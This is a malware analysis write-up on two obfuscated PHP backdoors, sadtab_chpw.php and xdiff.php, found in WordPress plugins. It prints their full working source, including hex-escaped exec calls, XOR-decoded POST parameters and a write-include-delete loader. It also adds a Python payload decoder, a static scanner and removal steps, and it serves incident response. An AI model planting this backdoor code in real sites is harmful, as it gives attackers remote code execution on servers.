Technical Analysis
While reviewing the WordPress site, I found two malicious files, sadtab_chpw.php and xdiff.php. Both were located inside plugin directories and were flagged as malicious by Wordfence; VirusTotal confirmed them as Zero-Day/Unique threats.
The sadtab_chpw.php script hides the names of the functions it calls inside hex-escaped strings that resolve to system, shell_exec, exec, passthru and popen (plus the helpers hex2bin, stream_get_contents and pclose), so none of those names appear in plain text. When a POST request carries a "marker" parameter, the value is hex-decoded, XORed byte by byte with 80, and handed to the first execution function that exists on the host, giving whoever sends the request command execution on the server.
Similarly, xdiff.php reads a "token" POST parameter, hex-decodes it and XORs each byte with 36 to recover PHP source. It then walks a list of candidate directories (/var/tmp, upload_tmp_dir, the current directory, /dev/shm, TEMP, the system temp dir, the session save path, /tmp and TMP), writes the decoded code to a hidden file named .data_chunk in the first one that is writable, includes it, and deletes it afterwards. This write-include-delete pattern is typical of a backdoor: it gives the attacker persistent code execution through any writable directory while leaving little on disk to find.
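During incident response the hex string is usually all that survives in a WAF log or packet capture, and the question is what was sent. The decoder below is an added example, not code from this write-up or from either sample: it assumes a form-encoded POST body, uses the parameter names and XOR keys (80 and 36) read from the two samples, and the hex values in it are constructed for illustration rather than captured traffic. It also goes beyond the page by ranking all 256 single-byte keys for a variant whose key is not yet known.

```python
"""Decode request parameters sent to the sadtab_chpw.php / xdiff.php backdoors."""
import binascii
from urllib.parse import parse_qs

# Parameter names and XOR keys as read from the two samples in the write-up.
BACKDOOR_PARAMS = {"marker": 80, "token": 36}

# Bytes a decoded shell command or PHP payload is expected to be rich in
# (used only to rank candidate keys when the key is unknown).
_LIKELY = set(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ <?>();/-=_$'\"")


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one key, the operation both backdoors apply."""
    return bytes(b ^ key for b in data)


def decode_payload(hex_value: str, key: int) -> bytes:
    """Reverse hex2bin() followed by the single-byte XOR."""
    return xor_single_byte(binascii.unhexlify(hex_value.strip()), key)


def _score(candidate: bytes) -> int:
    """-1 if the candidate contains non-printable bytes, else a plausibility count."""
    if any(b not in b"\t\n\r" and not 0x20 <= b <= 0x7E for b in candidate):
        return -1
    return sum(1 for b in candidate if b in _LIKELY)


def rank_keys(raw: bytes) -> list[tuple[int, bytes]]:
    """For a variant with an unknown key: try all 256 keys, most plausible first."""
    scored = [(_score(xor_single_byte(raw, k)), k) for k in range(256)]
    scored.sort(key=lambda s: (-s[0], s[1]))
    return [(k, xor_single_byte(raw, k)) for s, k in scored if s >= 0]


def decode_request_body(body: str) -> dict[str, bytes]:
    """Decode every known backdoor parameter found in a form-encoded POST body."""
    found = {}
    for name, values in parse_qs(body).items():
        if name in BACKDOOR_PARAMS:
            found[name] = decode_payload(values[0], BACKDOOR_PARAMS[name])
    return found


# Constructed samples (not captured traffic): "id" encoded for sadtab_chpw.php
# and "<?php phpinfo();" encoded for xdiff.php, each XORed with its key then hex-encoded.
SAMPLE_BODIES = [
    "marker=3934",
    "token=181b544c5404544c544d4a424b0c0d1f",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        for name, decoded in decode_request_body(body).items():
            print(f"{name}: {decoded!r}")
    raw = bytes.fromhex("181b544c5404544c544d4a424b0c0d1f")
    print("best key guess for the xdiff sample:", rank_keys(raw)[0])
```

The key-ranking step rejects any key that yields non-printable bytes and then prefers the candidate with the most letters, spaces and PHP/shell punctuation; for very short payloads several keys will tie, so treat the ranking as a shortlist to eyeball rather than a verdict.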
VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.
Attack Chain
- Detection of malicious plugins by Wordfence.
- Analysis of sadtab_chpw.php and xdiff.php.
- Verification of Zero-Day/Unique status on VirusTotal.
Code Signature(s)
FILE: sadtab_chpw.php
<?php
$task_processor4 = "p\x61\x73sth\x72\x75";
$task_processor5 = "p\x6F\x70en";
$task_processor1 = "\x73ys\x74\x65m";
$task_processor2 = "\x73hell_e\x78ec";
$task_processor3 = "\x65\x78ec";
$publish_content = "h\x65x2\x62\x69n";
$task_processor6 = "\x73\x74\x72ea\x6D_\x67\x65\x74_\x63\x6F\x6Etents";
$task_processor7 = "\x70clo\x73e";
if (isset($_POST["\x6D\x61rk\x65r"])) {
function secure_access ($record , $fac ) { $ent= '' ; for($l=0; $l<strlen($record); $l++){$ent.=chr(ord($record[$l])^$fac);} return$ent;}
$marker = $publish_content($_POST["\x6D\x61rk\x65r"]);
$marker = secure_access($marker, 80);
if (function_exists($task_processor1)) {
$task_processor1($marker);
} elseif (function_exists($task_processor2)) {
print $task_processor2($marker);
} elseif (function_exists($task_processor3)) {
$task_processor3($marker, $pset_record);
print join("\n", $pset_record);
} elseif (function_exists($task_processor4)) {
$task_processor4($marker);
} elseif (function_exists($task_processor5) && function_exists($task_processor6) && function_exists($task_processor7)) {
$fac_ent = $task_processor5($marker, 'r');
if ($fac_ent) {
$res_holder = $task_processor6($fac_ent);
$task_processor7($fac_ent);
print $res_holder;
}
}
exit;
}
FILE: xdiff.php
<?php
if(filter_has_var(INPUT_POST, "\x74oke\x6E")){
$key = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/tmp", getenv("TMP")]);
$symbol = hex2bin($_POST["\x74oke\x6E"]);
$sym = '' ; foreach(str_split($symbol) as $char){$sym .= chr(ord($char) ^ 36);}
$k = 0;
do {
$parameter_group = $key[$k] ?? null;
if ($k >= count($key)) break;
if (is_dir($parameter_group) && is_writable($parameter_group)) {
$dat = str_replace("{var_dir}", $parameter_group, "{var_dir}/.data_chunk");
$success = file_put_contents($dat, $sym);
if ($success) {
include $dat;
@unlink($dat);
exit;}
}
$k++;
} while (true);
}
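To find further copies of this pattern on a host, a static check can resolve PHP hex-escape strings and score the combination that both samples share: escaped execution-function names, an escaped request parameter name and a single-byte XOR loop. The scanner below is an added example in Python, not part of the original write-up or of either sample; the scoring weights and the "suspicious" threshold are my own assumptions, the excerpt it scans is taken from the sadtab_chpw.php listing above (strings, request parameter and XOR loop only), and the benign file is constructed for contrast.

```python
"""Static check for the hex-escape obfuscation used by sadtab_chpw.php and xdiff.php."""
import re

# Execution functions the samples hide behind "\xNN" escapes.
EXEC_FUNCS = {"system", "shell_exec", "exec", "passthru", "popen", "proc_open", "eval"}
# Helpers the samples also reference; low weight on their own.
HELPER_FUNCS = {"hex2bin", "stream_get_contents", "pclose", "base64_decode"}

STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
REQUEST_KEY = re.compile(r'\$_(?:POST|GET|REQUEST|COOKIE)\s*\[\s*"((?:[^"\\]|\\.)*)"\s*\]')
XOR_LOOP = re.compile(r'chr\s*\(\s*ord\s*\([^)]*\)\s*\^')
_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|u\{[0-9A-Fa-f]+\}|.)', re.S)
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "f": "\f", "e": "\x1b",
           "$": "$", '"': '"', "\\": "\\"}


def decode_php_string(body: str) -> str:
    """Resolve the escape sequences PHP honours inside a double-quoted string."""
    def repl(m: re.Match) -> str:
        esc = m.group(1)
        if esc[0] == "x":                      # "\x73" -> "s"
            return chr(int(esc[1:], 16))
        if esc[0] in "01234567":               # "\163" -> "s"
            return chr(int(esc, 8) & 0xFF)
        if esc[0] == "u" and len(esc) > 1:     # "\u{73}" -> "s"
            return chr(int(esc[2:-1], 16))
        return _SIMPLE.get(esc, "\\" + esc)    # unknown escapes stay literal, as in PHP
    return _ESCAPE.sub(repl, body)


def scan_php(source: str) -> dict:
    """Score one PHP source text; weights and threshold are assumptions, not Wordfence's."""
    findings, score = [], 0
    for m in STRING_LITERAL.finditer(source):
        literal = m.group(1)
        if "\\" not in literal:                # plain literals are not obfuscated
            continue
        name = decode_php_string(literal)
        if name in EXEC_FUNCS:
            findings.append(f"escaped literal resolves to execution function {name}")
            score += 3
        elif name in HELPER_FUNCS:
            findings.append(f"escaped literal resolves to helper {name}")
            score += 1
    for m in REQUEST_KEY.finditer(source):
        if "\\" in m.group(1):
            findings.append(f"escaped request parameter name {decode_php_string(m.group(1))!r}")
            score += 2
    if XOR_LOOP.search(source):
        findings.append("single-byte XOR decode loop: chr(ord(...) ^ key)")
        score += 2
    verdict = "suspicious" if score >= 4 else "clean"
    return {"score": score, "verdict": verdict, "findings": findings}


# Excerpt of the sadtab_chpw.php listing from this write-up, and a constructed benign file.
SAMPLE_SADTAB = r'''<?php
$task_processor1 = "\x73ys\x74\x65m";
$task_processor2 = "\x73hell_e\x78ec";
$publish_content = "h\x65x2\x62\x69n";
if (isset($_POST["\x6D\x61rk\x65r"])) {
function secure_access ($record , $fac ) { $ent= '' ; for($l=0; $l<strlen($record); $l++){$ent.=chr(ord($record[$l])^$fac);} return$ent;}
}
'''
SAMPLE_BENIGN = r'''<?php
$greeting = "Hello,\n\tworld";
echo htmlspecialchars($greeting);
'''

if __name__ == "__main__":
    for label, src in (("sadtab excerpt", SAMPLE_SADTAB), ("benign", SAMPLE_BENIGN)):
        result = scan_php(src)
        print(f"{label}: {result['verdict']} (score {result['score']})")
        for finding in result["findings"]:
            print("  -", finding)
```

Run it over the plugin and upload directories (for example, feeding each .php file's contents to scan_php) and review anything scored "suspicious"; a single escaped helper name alone stays below the threshold, so ordinary minified or localised plugin code does not trip it.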
Indicators of Compromise (IOCs)
sadtab_chpw[.]php
xdiff[.]php
Removal Protocol
- Immediately remove the files sadtab_chpw.php and xdiff.php.
- Update all WordPress plugins to the latest versions.
- Perform a full security audit of the file system.
- Monitor network traffic for suspicious activities.
Status: Active Threat.
Verification: Verified by MD Pabel.